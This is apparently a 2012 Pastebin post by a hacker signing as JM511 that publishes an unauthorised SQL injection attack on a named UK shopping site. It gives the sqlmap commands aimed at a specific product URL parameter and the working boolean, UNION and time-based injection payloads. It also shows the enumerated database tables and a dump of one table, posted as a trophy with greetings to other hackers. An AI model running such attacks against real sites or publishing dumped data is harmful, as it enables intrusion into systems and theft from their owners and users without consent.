Advertisement
Islam-Hacker

Database: buy-a.co.uk Published by JM511

Aug 24th, 2012
224
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.03 KB | None | 0 0
  1. Published by JM511
  2. Follow me : www.twitter.com/JM511
  3. From : Saudi Arabia
  4. Greeting to : #in3ctor , Shi5-AlHacker , Dr.ExE , Zombie_KsA , Nok511 , Virus511 ,ALM511 , Sarbot511
  5. ====================
  6.  
  7. Database of : www.buy-a.co.uk
  8. =====================
  9.  
  10. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.buy-a.co.uk/product.php?product_id=7115 -D adstorm_buya --tables
  11.  
  12. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  13. http://sqlmap.org
  14.  
  15. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  16.  
  17. [*] starting at 14:39:02
  18.  
  19. [14:39:02] [INFO] resuming back-end DBMS 'mysql'
  20. [14:39:05] [INFO] testing connection to the target url
  21. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  22. ---
  23. Place: GET
  24. Parameter: product_id
  25. Type: boolean-based blind
  26. Title: AND boolean-based blind - WHERE or HAVING clause
  27. Payload: product_id=7115 AND 3617=3617
  28.  
  29. Type: UNION query
  30. Title: Generic UNION query (NULL) - 1 column
  31. Payload: product_id=7115 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6d6b6d3a,0x456d7a42416b6f677547,0x3a6d72783a)--
  32.  
  33. Type: AND/OR time-based blind
  34. Title: MySQL > 5.0.11 AND time-based blind
  35. Payload: product_id=7115 AND SLEEP(5)
  36. ---
  37.  
  38. [14:39:11] [INFO] the back-end DBMS is MySQL
  39.  
  40. web application technology: Apache, PHP 5.2.17
  41. back-end DBMS: MySQL 5.0.11
  42. [14:39:11] [INFO] fetching tables for database: 'adstorm_buya'
  43. Database: adstorm_buya
  44. [3 tables]
  45. +----------------+
  46. | categories |
  47. | product_groups |
  48. | products |
  49. +----------------+
  50.  
  51. [14:39:15] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.buy-a.co.uk'
  52.  
  53. [*] shutting down at 14:39:15
  54.  
  55. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.buy-a.co.uk/product.php?product_id=7115 -D adstorm_buya --dump
  56.  
  57. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  58. http://sqlmap.org
  59.  
  60. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  61.  
  62. [*] starting at 14:39:22
  63.  
  64. [14:39:22] [INFO] resuming back-end DBMS 'mysql'
  65. [14:39:25] [INFO] testing connection to the target url
  66. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  67. ---
  68. Place: GET
  69. Parameter: product_id
  70. Type: boolean-based blind
  71. Title: AND boolean-based blind - WHERE or HAVING clause
  72. Payload: product_id=7115 AND 3617=3617
  73.  
  74. Type: UNION query
  75. Title: Generic UNION query (NULL) - 1 column
  76. Payload: product_id=7115 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6d6b6d3a,0x456d7a42416b6f677547,0x3a6d72783a)--
  77.  
  78. Type: AND/OR time-based blind
  79. Title: MySQL > 5.0.11 AND time-based blind
  80. Payload: product_id=7115 AND SLEEP(5)
  81. ---
  82.  
  83. [14:39:31] [INFO] the back-end DBMS is MySQL
  84.  
  85. web application technology: Apache, PHP 5.2.17
  86. back-end DBMS: MySQL 5.0.11
  87. [14:39:31] [INFO] fetching tables for database: 'adstorm_buya'
  88. [14:39:31] [INFO] fetching columns for table 'categories' in database 'adstorm_buya'
  89. [14:39:35] [INFO] fetching entries for table 'categories' in database 'adstorm_buya'
  90. [14:39:39] [INFO] analyzing table dump for possible password hashes
  91. Database: adstorm_buya
  92. Table: categories
  93. [9 entries]
  94. +----+----------------------+
  95. | ID | Category |
  96. +----+----------------------+
  97. | 1 | Electrical |
  98. | 2 | Computing |
  99. | 3 | Photographic |
  100. | 4 | Book |
  101. | 5 | DIY |
  102. | 6 | Gift |
  103. | 7 | Household |
  104. | 8 | Books & Magazines |
  105. | 9 | Consumer Electronics |
  106. +----+----------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement